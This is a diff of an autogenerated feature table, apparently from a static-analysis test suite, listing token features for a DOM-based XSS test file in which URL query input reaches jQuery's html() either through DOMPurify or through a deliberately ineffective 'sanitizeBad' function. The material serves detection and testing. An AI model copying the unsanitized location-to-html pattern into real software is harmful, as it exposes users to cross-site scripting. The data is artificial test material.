autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:13 | $('myId') | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:13 | $('myId') | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:13 | $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:13 | $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:13 | exceptional return of $('myId') | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:13 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:13 | exceptional return of $('myId') | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:13 | exceptional return of $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:13 | exceptional return of $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:18 | $('myId').html | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:18 | $('myId').html | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:18 | $('myId').html | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:18 | $('myId').html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:18 | $('myId').html | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:21 | $('myId').html(x) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:21 | $('myId').html(x) | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:21 | $('myId').html(x) | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:21 | $('myId').html(x) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:21 | $('myId').html(x) | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:21 | exceptional return of $('myId').html(x) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:21 | exceptional return of $('myId').html(x) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:21 | exceptional return of $('myId').html(x) | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:21 | exceptional return of $('myId').html(x) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:21 | exceptional return of $('myId').html(x) | fileImports | | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:7:21:12 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:7:21:12 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:7:21:12 | 'myId' | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | @@ -14450,6 +104985,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:7:21:12 | 'myId' | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:7:21:12 | 'myId' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:7:21:12 | 'myId' | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:15:21:18 | html | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:15:21:18 | html | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:15:21:18 | html | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:15:21:18 | html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:15:21:18 | html | fileImports | | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:20:21:20 | x | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:20:21:20 | x | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:20:21:20 | x | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | @@ -14457,6 +104997,172 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:20:21:20 | x | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:20:21:20 | x | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:20:21:20 | x | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:25:1:25:0 | this | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:25:1:25:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:25:1:25:0 | this | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:25:1:25:0 | this | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:25:1:25:0 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:25:1:46:1 | 'arguments' object of function badSanitizer | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:25:1:46:1 | 'arguments' object of function badSanitizer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:25:1:46:1 | 'arguments' object of function badSanitizer | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:25:1:46:1 | 'arguments' object of function badSanitizer | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:25:1:46:1 | 'arguments' object of function badSanitizer | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:25:1:46:1 | exceptional return of function badSanitizer | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:25:1:46:1 | exceptional return of function badSanitizer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:25:1:46:1 | exceptional return of function badSanitizer | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:25:1:46:1 | exceptional return of function badSanitizer | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:25:1:46:1 | exceptional return of function badSanitizer | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:25:1:46:1 | functio ... OT OK\\n} | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:25:1:46:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:25:1:46:1 | functio ... OT OK\\n} | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:25:1:46:1 | return of function badSanitizer | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:25:1:46:1 | return of function badSanitizer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:25:1:46:1 | return of function badSanitizer | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:25:1:46:1 | return of function badSanitizer | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:25:1:46:1 | return of function badSanitizer | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:25:10:25:21 | badSanitizer | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:25:10:25:21 | badSanitizer | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:25:10:25:21 | badSanitizer | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:7:26:12 | target | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:7:26:12 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:7:26:12 | target | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:7:26:12 | target | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:7:26:12 | target | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:7:26:39 | target | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:7:26:39 | target | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:7:26:39 | target | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:7:26:39 | target | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:7:26:39 | target | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:7:26:39 | target ... .search | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:7:26:39 | target ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:7:26:39 | target ... .search | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:7:26:39 | target ... .search | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:7:26:39 | target ... .search | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:16:26:23 | document | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:16:26:23 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:16:26:23 | document | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:16:26:23 | document | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:16:26:23 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:16:26:32 | document.location | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:16:26:32 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:16:26:32 | document.location | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:16:26:32 | document.location | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:16:26:32 | document.location | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:16:26:39 | documen ... .search | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:16:26:39 | documen ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:16:26:39 | documen ... .search | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:16:26:39 | documen ... .search | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:16:26:39 | documen ... .search | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:25:26:32 | location | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:25:26:32 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:25:26:32 | location | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:25:26:32 | location | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:25:26:32 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:34:26:39 | search | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:34:26:39 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:34:26:39 | search | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:34:26:39 | search | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:26:34:26:39 | search | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:3:28:2 | this | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:3:28:2 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:3:28:2 | this | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:3:28:2 | this | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:3:28:2 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:3:30:3 | 'arguments' object of function sanitizeBad | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:3:30:3 | 'arguments' object of function sanitizeBad | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:3:30:3 | 'arguments' object of function sanitizeBad | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:3:30:3 | 'arguments' object of function sanitizeBad | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:3:30:3 | 'arguments' object of function sanitizeBad | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:3:30:3 | exceptional return of function sanitizeBad | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:3:30:3 | exceptional return of function sanitizeBad | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:3:30:3 | exceptional return of function sanitizeBad | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:3:30:3 | exceptional return of function sanitizeBad | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:3:30:3 | exceptional return of function sanitizeBad | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:3:30:3 | functio ... on;\\n } | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:3:30:3 | functio ... on;\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:3:30:3 | functio ... on;\\n } | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:3:30:3 | functio ... on;\\n } | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:3:30:3 | functio ... on;\\n } | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:3:30:3 | return of function sanitizeBad | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:3:30:3 | return of function sanitizeBad | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:3:30:3 | return of function sanitizeBad | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:3:30:3 | return of function sanitizeBad | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:3:30:3 | return of function sanitizeBad | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:12:28:22 | sanitizeBad | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:12:28:22 | sanitizeBad | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:12:28:22 | sanitizeBad | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:12:28:22 | sanitizeBad | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:12:28:22 | sanitizeBad | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:12:28:22 | sanitizeBad | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:12:28:22 | sanitizeBad | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:12:28:22 | sanitizeBad | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:12:28:22 | sanitizeBad | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:12:28:22 | sanitizeBad | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:24:28:24 | x | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:24:28:24 | x | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:24:28:24 | x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:24:28:24 | x | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:24:28:24 | x | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:24:28:24 | x | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:24:28:24 | x | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:24:28:24 | x | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:24:28:24 | x | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:28:24:28:24 | x | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:29:12:29:12 | x | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:29:12:29:12 | x | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:29:12:29:12 | x | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:29:12:29:12 | x | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:29:12:29:12 | x | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:31:7:31:14 | tainted2 | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:31:7:31:14 | tainted2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:31:7:31:14 | tainted2 | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:31:7:31:14 | tainted2 | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:31:7:31:14 | tainted2 | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:31:7:31:23 | tainted2 | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:31:7:31:23 | tainted2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:31:7:31:23 | tainted2 | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:31:7:31:23 | tainted2 | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:31:7:31:23 | tainted2 | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:31:7:31:23 | tainted2 = target | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:31:7:31:23 